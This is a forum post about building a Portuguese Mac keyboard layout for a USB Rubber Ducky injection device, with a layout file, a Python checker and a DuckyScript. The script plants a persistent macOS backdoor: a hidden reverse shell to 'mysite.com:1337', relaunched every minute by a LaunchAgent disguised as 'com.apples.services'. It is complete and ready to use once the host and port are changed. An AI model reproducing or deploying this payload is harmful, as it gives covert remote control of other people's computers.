Hak5 Forums
wildlifechorus

Rubber Ducky Emulator/Simulator

Hey guys,

I'm trying to map a pt_PT (Mac) keyboard; however, every time I want to test my mappings I have to unplug the SD card, stick it into the rubber ducky and run it.

Is there a better way? Like an Emulator/Simulator?

I think I'm almost there, but it's a pain in the ass.

Best,

Here's what I have so far:

ptosx.properties

// KEYS

MODIFIERKEY_CTRL = 0x01
MODIFIERKEY_SHIFT = 0x02
MODIFIERKEY_ALT = 0x04
MODIFIERKEY_GUI = 0x08
MODIFIERKEY_LEFT_CTRL = 0x01
MODIFIERKEY_LEFT_SHIFT = 0x02
MODIFIERKEY_LEFT_ALT = 0x04
MODIFIERKEY_LEFT_GUI = 0x08
MODIFIERKEY_RIGHT_CTRL = 0x10
MODIFIERKEY_RIGHT_SHIFT = 0x20
MODIFIERKEY_RIGHT_ALT = 0x40
MODIFIERKEY_RIGHT_GUI = 0x80

KEY_A = 0
KEY_B = 11
KEY_C = 8
KEY_D = 2
KEY_E = 14
KEY_F = 3
KEY_G = 5
KEY_H = 4
KEY_I = 34
KEY_J = 38
KEY_K = 40
KEY_L = 37
KEY_M = 46
KEY_N = 45
KEY_O = 31
KEY_P = 35
KEY_Q = 12
KEY_R = 15
KEY_S = 1
KEY_T = 17
KEY_U = 32
KEY_V = 9
KEY_W = 13
KEY_X = 7
KEY_Y = 16
KEY_Z = 6

KEY_1 = 18
KEY_2 = 19
KEY_3 = 20
KEY_4 = 21
KEY_5 = 23
KEY_6 = 22
KEY_7 = 26
KEY_8 = 28
KEY_9 = 25
KEY_0 = 29

KEY_ENTER = 36
KEY_ESC = 53
KEY_BACKSPACE = 51
KEY_TAB = 48
KEY_SPACE = 49
KEY_MINUS = 44
KEY_ARROW = 50
KEY_ACCENT = 30

KEY_QUOTE = 27
KEY_COMMA = 43
KEY_PERIOD = 47
KEY_SLASH = 42
KEY_PLUS = 24
KEY_TILDE = 39

KEY_RIGHT = 124
KEY_LEFT = 123
KEY_DOWN = 125
KEY_UP = 126

KEY_LEFT_CTRL = 0xE0
KEY_LEFT_SHIFT = 0xE1
KEY_LEFT_ALT = 0xE2
KEY_LEFT_GUI = 0xE3
KEY_COMMAND = 0xE3
KEY_RIGHT_CTRL = 0xE4
KEY_RIGHT_SHIFT = 0xE5
KEY_RIGHT_ALT = 0xE6
KEY_RIGHT_GUI = 0xE7

// ASCII

// 32
ASCII_20 = KEY_SPACE
// 33 ! 49 1
ASCII_21 = KEY_1, MODIFIERKEY_SHIFT
ASCII_31 = KEY_1
// 34 " 50 2
ASCII_22 = KEY_2, MODIFIERKEY_SHIFT
ASCII_32 = KEY_2
// 35 # 51 3
ASCII_23 = KEY_3, MODIFIERKEY_SHIFT
ASCII_33 = KEY_3
// 36 $ 52 4
ASCII_24 = KEY_4, MODIFIERKEY_SHIFT
ASCII_34 = KEY_4
// 37 % 53 5
ASCII_25 = KEY_5, MODIFIERKEY_SHIFT
ASCII_35 = KEY_5
// 38 & 54 6
ASCII_26 = KEY_6, MODIFIERKEY_SHIFT
ASCII_36 = KEY_6
// 47 / 55 7
ASCII_2F = KEY_7, MODIFIERKEY_SHIFT
ASCII_37 = KEY_7
// 40 ( 56 8
ASCII_28 = KEY_8, MODIFIERKEY_SHIFT
ASCII_38 = KEY_8
// 41 ) 57 9
ASCII_29 = KEY_9, MODIFIERKEY_SHIFT
ASCII_39 = KEY_9
// 61 = 48 0
ASCII_3D = KEY_0, MODIFIERKEY_SHIFT
ASCII_30 = KEY_0
// 39 ' 63 ?
ASCII_3F = KEY_MINUS, MODIFIERKEY_SHIFT
ASCII_27 = KEY_MINUS
// 42 * 43 +
ASCII_2A = KEY_PLUS, MODIFIERKEY_SHIFT
ASCII_2B = KEY_PLUS
// 44 , 59 ;
ASCII_2C = KEY_COMMA
ASCII_3B = KEY_COMMA, MODIFIERKEY_SHIFT
// 45 - 95 _
ASCII_2D = KEY_SLASH
ASCII_5F = KEY_SLASH, MODIFIERKEY_SHIFT
// 46 . 58 :
ASCII_2E = KEY_PERIOD
ASCII_3A = KEY_PERIOD, MODIFIERKEY_SHIFT
// 60 < 62 >
ASCII_3C = KEY_TILDE
ASCII_3E = KEY_TILDE, MODIFIERKEY_SHIFT
// 64 @
ASCII_40 = KEY_2, MODIFIERKEY_RIGHT_ALT
// 65 A
ASCII_41 = KEY_A, MODIFIERKEY_SHIFT
// 66 B
ASCII_42 = KEY_B, MODIFIERKEY_SHIFT
// 67 C
ASCII_43 = KEY_C, MODIFIERKEY_SHIFT
// 68 D
ASCII_44 = KEY_D, MODIFIERKEY_SHIFT
// 69 E
ASCII_45 = KEY_E, MODIFIERKEY_SHIFT
// 70 F
ASCII_46 = KEY_F, MODIFIERKEY_SHIFT
// 71 G
ASCII_47 = KEY_G, MODIFIERKEY_SHIFT
// 72 H
ASCII_48 = KEY_H, MODIFIERKEY_SHIFT
// 73 I
ASCII_49 = KEY_I, MODIFIERKEY_SHIFT
// 74 J
ASCII_4A = KEY_J, MODIFIERKEY_SHIFT
// 75 K
ASCII_4B = KEY_K, MODIFIERKEY_SHIFT
// 76 L
ASCII_4C = KEY_L, MODIFIERKEY_SHIFT
// 77 M
ASCII_4D = KEY_M, MODIFIERKEY_SHIFT
// 78 N
ASCII_4E = KEY_N, MODIFIERKEY_SHIFT
// 79 O
ASCII_4F = KEY_O, MODIFIERKEY_SHIFT
// 80 P
ASCII_50 = KEY_P, MODIFIERKEY_SHIFT
// 81 Q
ASCII_51 = KEY_Q, MODIFIERKEY_SHIFT
// 82 R
ASCII_52 = KEY_R, MODIFIERKEY_SHIFT
// 83 S
ASCII_53 = KEY_S, MODIFIERKEY_SHIFT
// 84 T
ASCII_54 = KEY_T, MODIFIERKEY_SHIFT
// 85 U
ASCII_55 = KEY_U, MODIFIERKEY_SHIFT
// 86 V
ASCII_56 = KEY_V, MODIFIERKEY_SHIFT
// 87 W
ASCII_57 = KEY_W, MODIFIERKEY_SHIFT
// 88 X
ASCII_58 = KEY_X, MODIFIERKEY_SHIFT
// 89 Y
ASCII_59 = KEY_Y, MODIFIERKEY_SHIFT
// 90 Z
ASCII_5A = KEY_Z, MODIFIERKEY_SHIFT
// 91 [ 93 ]
ASCII_5B = KEY_8, MODIFIERKEY_RIGHT_ALT
ASCII_5D = KEY_9, MODIFIERKEY_RIGHT_ALT
// 94 ^ 126 ~
ASCII_5E = KEY_TILDE, MODIFIERKEY_SHIFT
ASCII_7E = KEY_TILDE
// 96 `
ASCII_60 = KEY_ACCENT, MODIFIERKEY_SHIFT
// 97 a
ASCII_61 = KEY_A
// 98 b
ASCII_62 = KEY_B
// 99 c
ASCII_63 = KEY_C
// 100 d
ASCII_64 = KEY_D
// 101 e
ASCII_65 = KEY_E
// 102 f
ASCII_66 = KEY_F
// 103 g
ASCII_67 = KEY_G
// 104 h
ASCII_68 = KEY_H
// 105 i
ASCII_69 = KEY_I
// 106 j
ASCII_6A = KEY_J
// 107 k
ASCII_6B = KEY_K
// 108 l
ASCII_6C = KEY_L
// 109 m
ASCII_6D = KEY_M
// 110 n
ASCII_6E = KEY_N
// 111 o
ASCII_6F = KEY_O
// 112 p
ASCII_70 = KEY_P
// 113 q
ASCII_71 = KEY_Q
// 114 r
ASCII_72 = KEY_R
// 115 s
ASCII_73 = KEY_S
// 116 t
ASCII_74 = KEY_T
// 117 u
ASCII_75 = KEY_U
// 118 v
ASCII_76 = KEY_V
// 119 w
ASCII_77 = KEY_W
// 120 x
ASCII_78 = KEY_X
// 121 y
ASCII_79 = KEY_Y
// 122 z
ASCII_7A = KEY_Z
// 123 { 125 }
ASCII_7B = KEY_7, MODIFIERKEY_RIGHT_ALT
ASCII_7D = KEY_0, MODIFIERKEY_RIGHT_ALT
// 124 | 92 \
ASCII_7C = KEY_SLASH, MODIFIERKEY_SHIFT
ASCII_5C = KEY_SLASH
// 127
ASCII_7F = KEY_BACKSPACE

script.txt

REM Patrick Mosca
REM A simple script for creating a persistent backdoor on OSX.
REM Change mysite.com to your domain name or IP address
REM Change 1337 to your port number
REM Catch the shell with 'nc -l -p 1337'
REM http://patrickmosca.com/root-a-mac-in-10-seconds-or-less/
DELAY 1000
GUI SPACE
STRING sublime
DELAY 500
ENTER
DELAY 500
STRING mkdir ~/Library/.hidden
ENTER
DELAY 200
STRING echo '#!/bin/bash
ENTER
STRING bash -i >& /dev/tcp/mysite.com/1337 0>&1
ENTER
STRING wait' > ~/Library/.hidden/connect.sh
ENTER
DELAY 500
STRING chmod +x ~/Library/.hidden/connect.sh
ENTER
DELAY 200
STRING mkdir ~/Library/LaunchAgents
ENTER
DELAY 200
STRING echo '<plist version="1.0">
ENTER
STRING <dict>
ENTER
STRING <key>Label</key>
ENTER
STRING <string>com.apples.services</string>
ENTER
STRING <key>ProgramArguments</key>
ENTER
STRING <array>
ENTER
STRING <string>/bin/sh</string>
ENTER
STRING <string>'$HOME'/Library/.hidden/connect.sh</string>
ENTER
STRING </array>
ENTER
STRING <key>RunAtLoad</key>
ENTER
STRING <true/>
ENTER
STRING <key>StartInterval</key>
ENTER
STRING <integer>60</integer>
ENTER
STRING <key>AbandonProcessGroup</key>
ENTER
STRING <true/>
ENTER
STRING </dict>
ENTER
STRING </plist>' > ~/Library/LaunchAgents/com.apples.services.plist
ENTER
DELAY 200
STRING chmod 600 ~/Library/LaunchAgents/com.apples.services.plist
ENTER
DELAY 200
STRING launchctl load ~/Library/LaunchAgents/com.apples.services.plist
ENTER
DELAY 200

Output:

mkdir ¨/Library/.hidden
echo '#!/bin/bash
bash -i >& /dev/tcp/mysite.com/1337 0>&1
wait' > ¨/Library/.hidden/connect.sh
chmod ux ¨/Library/.hidden/connect.sh
mkdir ¨/Library/LaunchAgents
echo '<plist version="1.0">
<dict>
<key>Label</key>
<string>com.apples.services</string>
<key>ProgramArguments</key>
<array>
<string>/bin/sh</string>
<string>'$HOME'/Library/.hidden/connect.sh</string>
</array>
<key>RunAtLoad</key>
<true/>
<key>StartInterval</key>
<integer>60</integer>
<key>AbandonProcessGroup</key>
<true/>
</dict>
</plist>' > ¨/Library/LaunchAgents/com.apples.services.plist
chmod 600 ¨/Library/LaunchAgents/com.apples.services.plist
launchctl load ¨/Library/LaunchAgents/com.apples.services.plist
'

I'm missing a couple of chars: +, ~ are the most important. When I scan for my + and ~ keys I get these keycodes: 24, 29.

Could someone help?
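The poster wants to test a layout without plugging the Ducky in. Below is an added example (not the encoder's or the poster's code) that does the offline checks that matter here: it parses a layout in the .properties shape above (the embedded LAYOUT is a constructed excerpt of ptosx.properties), reports codes or (code, modifier) pairs that more than one entry shares, lists the characters a script's STRING lines need but the layout lacks, and dry-runs a STRING into the (code, modifier) pairs the layout resolves each character to.

```python
"""Offline checker for a Ducky keyboard .properties file (added example, not the
encoder's or the poster's code). LAYOUT is a constructed excerpt of ptosx.properties."""

LAYOUT = """
MODIFIERKEY_SHIFT = 0x02
KEY_F = 9
KEY_V = 9
KEY_PLUS = 24
KEY_TILDE = 39
KEY_SPACE = 49
// ASCII
ASCII_20 = KEY_SPACE
ASCII_2A = KEY_PLUS, MODIFIERKEY_SHIFT
ASCII_2B = KEY_PLUS
ASCII_3C = KEY_TILDE
ASCII_66 = KEY_F
ASCII_76 = KEY_V
ASCII_7E = KEY_TILDE
"""

def parse_layout(text):
    """Return ({name: code}, {char: (code, modifier_bits)}); '//' lines are comments."""
    keys, chars = {}, {}
    for line in (l.strip() for l in text.splitlines()):
        if not line or line.startswith("//") or "=" not in line:
            continue
        name, value = (s.strip() for s in line.split("=", 1))
        if not name.startswith("ASCII_"):
            keys[name] = int(value, 0)  # accepts 0x.. and decimal, as in the file
            continue
        parts = [p.strip() for p in value.split(",") if p.strip()]  # tolerates a stray ','
        mods = sum(keys[m] for m in parts[1:])  # modifier bits are distinct, so sum == OR
        chars[chr(int(name[6:], 16))] = (keys[parts[0]], mods)
    return keys, chars

def collisions(mapping):
    """Invert a dict and keep targets hit by more than one source (keys or chars)."""
    by_target = {}
    for src, tgt in mapping.items():
        by_target.setdefault(tgt, []).append(src)
    return {t: sorted(s) for t, s in by_target.items() if len(s) > 1}

def unmapped_chars(chars, script):
    """Characters that STRING lines of a DuckyScript need but the layout lacks."""
    needed = {c for l in script.splitlines() if l.startswith("STRING ") for c in l[7:]}
    return sorted(c for c in needed if c not in chars)

def keystrokes(chars, text):
    """Dry run of one STRING: the (code, modifier) pair resolved for each character."""
    return [chars[c] for c in text]
```

Run collisions over the KEY_ entries and over the character table separately: in the excerpt the shared KEY_F/KEY_V value shows up in both, and < and ~ collide on KEY_TILDE exactly as they do in the full file above.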
